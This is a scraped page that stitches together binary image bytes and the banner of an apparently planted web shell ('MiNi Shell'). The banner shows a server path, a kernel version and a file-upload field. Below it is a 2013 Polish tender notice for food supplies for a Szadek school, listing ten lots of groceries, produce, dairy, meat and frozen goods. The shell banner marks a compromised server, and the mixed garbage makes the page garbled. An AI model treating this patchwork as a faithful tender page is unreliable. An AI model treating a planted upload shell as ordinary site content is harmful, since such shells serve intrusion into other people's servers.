JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/472102-N-2013.html

<p class="kh_header"><b>Szadek: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę artykułów żywnościowych dla ZSRCKU.</b><br>
<b>Numer ogłoszenia: 472102 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku , ul. Prusinowska 4, 98-240 Szadek, woj. łódzkie, tel. 43 821 50 31, faks 43 821 50 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szadek.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół i Placówek Oświatowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na dostawę artykułów żywnościowych dla ZSRCKU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych w roku 2014 r. Przedmiot zamówienia został podzielony na 10 pakietów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.50.00.00-3, 15.40.00.00-2, 15.30.00.00-1, 15.20.00.00-0, 15.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szadek.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 10:00, miejsce: Zespół Publicznego Gimnazjum i Szkoły Podstawowej w Szadku
ul. Prusinowska 4
98-240 Szadek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przetwory  sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
Cukier  biały kryształ	1 kg	kg	1400
Cukier puder	400 g	kg	30
Proszek do pieczenia	30 g	szt	10 
Cukier wanilinowy	32 g	szt	200 
Drożdże piekarskie świeże	1kg	kg	2 
Mąka pszenna wrocławska  typu  500	1 kg	kg	1000 
Mąka ziemniaczana	1kg	kg	10 
Ryż biały długi	1 kg	kg	75 
Ryż w saszetkach biały długoziarnisty	400 g	szt	600 
Kasza manna zwykła	1 kg	kg	50 
Kasza jęczmienna średnia	1 kg	kg	500 
Kasza gryczana	1 kg	kg	130 
Sól spożywcza  jodowana drobna	1 kg	kg	300 
Pieprz mielony	20 g	szt	250 
Pieprz ziołowy	20 g	szt	500 
Pieprz ziarno	20 g	szt	50 
Papryka słodka mielona	20 g	szt	1000 
Majeranek suszony	20 g	szt	300 
Liść laurowy suszony	6 g	szt	70 
Ziele angielskie suszone	15g 	szt	70 
Kwasek cytrynowy spożywczy w proszku	20 g	szt	200 
Przyprawa do kurczaka łagodna bez glutaminianu sodu	20 g 	szt	100 
Przyprawa do zup i mięs  w proszku 	400g	szt	50
Kostki rosołowe ( różne)	200 g	szt	50 
Groszek konserwowy w puszce	400 g	szt	150 
Kukurydza konserwowa w puszce	400 g	szt	70 
Przyprawa w płynie do potraw 	1040g	szt	10 
Sos sałatkowy w proszku	20 g	szt	200 
Przyprawa do mięs bez konserwantów	200 g	szt	40 
Sałatka szwedzka	3 l	szt	60 
Pomidor b/s puszka	200g	szt	100
Przyprawa grillowa łagodna	20 g	szt	100
Oregano suszone	20 g	szt	50 
Bazylia suszona	20 g	szt	50 
Kminek suszony	20g	szt	50 
Sos do spaghetti  w słoiku	520 g	szt	300 
Sos boloński w słoiku	520 g	szt	200 
Sos słodko- kwaśny w słoiku	520 g	szt	200 
Sos grzybowy w proszku bez konserwantów	20 g	szt	60 
Sos pomidorowy w proszku bez konserwantów	20 g	szt	60 
Rodzynki gat.1 sułtanki	500 g 	szt	50 
Koncentrat pomidorowy 30%	0.900 l 	szt	120 
Ketchup łagodny, pikantny bez konserwantów 	0.5 l  	szt	60 
Syrop  żurawinowy z zagęszczonego soku, bezglutenowy	430 ml	szt	400 
Syrop  malinowy z zagęszczonego soku, bezglutenowy	430 ml	szt	200 
Syrop truskawka z zagęszczonego soku, bezglutenowy	430 ml	szt	300 
Syrop  czarna porzeczka z zagęszczonego soku, bezglutenowy	430 ml	szt	300 
Bułka tarta pszenna jasna	0.5 kg	szt	600 
Makaron świderki	500 g	szt	400 
Makaron rosołowy nitka 5 jajeczny	250 g	szt	350 
Makaron wstążka cięta 	500 g	szt	300 
Makaron rurka 	500 g	szt	200 
Makaron do spaghetti 	400 g	szt	500 
Koncentrat buraczkowy  min.59 % 	330 ml	szt	60 
Ocet jabłkowy 5%	300ml	szt	10
Olej rzepakowy  	1l	szt	1000 
Barszcz biały w płynie	1l	szt	200 
Żurek papierek bez konserwantów	20 g	szt	300 
Musztarda sarebska 	200 g	szt	50 
Chrzan tarty słoik bez dodatków	200 g	szt	60 
Majonez 	700 g	szt	100 
Kisiel  z sokiem owocowym bez sztucznych barwników ( różne smaki)3/4 litra wody	58 g	szt	1200 
Herbata  czarna w saszetkach	300 szt.	szt	15 
Galaretka bez sztucznych barwników ( różne smaki)	75 g	szt	200 
Dżem niskosłodzony z kawałkami owoców (różne smaki)	525g	szt	400 
Masło orzechowo- czekoladowe 	630 g	szt	20 
Wafelki paczkowane (różne smaki)  szt.	30g	szt	400 
Herbatniki 	100 g	szt	200 
Chrupki  kukurydziane do mleka czekoladowe	500 g	szt	60 
Zbożowe poduszeczki z nadzieniem różne smaki	500 g	szt	60
Kawa naturalna,  mielona, Arabica	500 g	szt	30 
Kakao naturalne tradycyjne	250 g	szt	10 
Woda mineralna niegazowana	1,5l	Szt	60
biszkopty	500g	szt	73.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
Ziemniaki jadalne, nie pastewne,                                              	1kg	kg	16000 
Marchew  	1kg	kg	1100 
Pietruszka 	1kg	kg	200 
Seler 	1kg	kg	200 
Por  	1kg	kg	200
Cebula biała	1kg	kg	150 
Cebula czerwona 	1kg	kg	30 
Kapusta biała 	1kg	kg	600 
Kapusta czerwona 	1kg	kg	50 
Kapusta pekińska 	1kg	kg	400 
Kapusta kwaszona 	1kg	kg	1100 
Kapusta włoska 	1kg	kg	60 
Fasola średni Jaś 	1kg	kg	200 
Burak ćwikłowy	1kg	kg	1000 
Ogórek kwaszony 	1kg	kg	500 
Ogórek konserwowy duża puszka 	12,25 l.	szt	25
Ogórek konserwowy mała puszka 	4,2 l.	szt	25 
Ogórek zielony 	1kg	kg	350 
Pomidor 	1kg	kg	150 
Papryka  	1kg	kg	60 
Sałata główka	1	szt.	200 
Sałata karbowana  główka	1	szt.	400 
Kalafior główka	1	szt.	200 
Jabłko lobo	1kg	kg	1000 
Cytryna 	1kg	kg	400 
Pieczarki  	1kg	kg	60 
Szczypior ( pęczek)	1	szt.	100 
Natka pietruszki ( pęczek)	1	szt.	300  
Koperek (pęczek)	1	szt.	400
Rzodkiewka  (pęczek)	1	szt.	70 
Brokuł 	1kg	kg	150 
Fasola szparagowa  zielona 	1kg	kg	150
Czosnek świeży  główka polski	1	szt.	30 
Banan 	1kg	kg	300 
Mandarynka 	1kg	kg	100 
Śliwka 	1kg	kg	15 
Gruszka 	1kg	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże duże kl. L chowu ściółkowego	65-70 g	szt	16500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb krojony pszenny 	500 g	szt	700 
Bułka duża pszenna	100 g	szt	900
Bułka mała pszenna	50g	szt	5000
Chałka  drożdżowe pieczywo pszenne	400 g	szt	60 
Angielka krojona 	400 g	szt	100
Pączki  nadziewane marmoladą 	80g	szt	400
Bułka drożdżowa 	130 g	szt	300
Rogal pszenny	100 g	szt	600
Placek drożdżowy	500g	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło zawartość tłuszczu roślinnego 82%	250g	kg	30 
Mleko folia 2% pasteryzowane	1l.	litry	200 
Mleko  karton 3.2% UHT	1l.	szt	600 
Śmietana 18% 	400 ml	litry	300 
Jogurty naturalny	400 g	szt	700
Jogurt owocowy ( różne smaki) zawierający kawałki owoców	125 g	szt	4500
Twaróg półtłusty kl I	1kg	kg	120 
Twarożek kanapkowo- sernikowy nie wymagający mielenia	1kg	kg	160 
Ser żółty  tłusty  kl I(Gouda)	1kg	kg	7
Margaryna zawartość tłuszczu roślinnego min.39 %	500 g	szt	300 
Margaryna zawartość tłuszczu 60% witamina A i D3	500g	szt	50
Jogurt waniliowy	125g	szt	400
Jogurt czekoladowy	125g	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kości wędzone 	1kg	kg	50 
Schab b/k  	1kg	kg	720 
Karczek b/k 	1kg	kg	980 
Szynka surowa wieprzowa b/k 	1kg	kg	500 
Wołowina b/k  	1kg	kg	100 
Brzuch Świeży surowy b/ż 	1kg	kg	300 
Boczek wędzony b/ ż 	1kg	kg	170 
Kiełbasa Szynkowa kl I 80% mięsa wieprzowego	1kg	kg	300 
Pachwina wędzona 	1kg	kg	200 
Parówki cienkie drobiowe min.60% 	1kg	kg	130 
Pasztet  drobiowy  min. 56% mięsa  (słoik) 	460 g	szt	30 
Kiełbasa krakowska min. 68% mięsa	1 kg	kg	30
Kiełbasa cienka Szynkówka min. 50 % mięsa	1kg	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Porcja rosołowa ze skrzydełkami 	1kg	kg	400 
Pałka kurczaka 	1kg	kg	500 
Udko 	1kg	kg	600 
Filet z kurczaka 	1kg	kg	 1200
Filet z indyka 	1kg	kg	400 
Kiełbasa drobiowa  min.60% mięsa	1kg	kg	100 
Pasztet drobiowy 56 % mięsa ( słoik) 	500g	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z miruny	1kg	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Garmażeria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kopytka	1kg	kg	700
śląskie	1kg	kg	700
Pierogi z mięsem	1kg	kg	700
pampuchy	50g	szt	12500
Pierogi leniwe	1kg	kg	700
Pierogi z kapustą i grzybami	1kg	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bukiet warzyw	2.5kg	sz	200
Truskawki	2.5 kg	kg	200
wiśnia	2.5kg	kg	80
brokuły	2.5kg	kg	300
Marchewka mini	2.5 kg	kg	200
Mieszanka wieloskładnikowa	2.5kg	kg	300
Fasolka szparagowa	2.5 kg	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com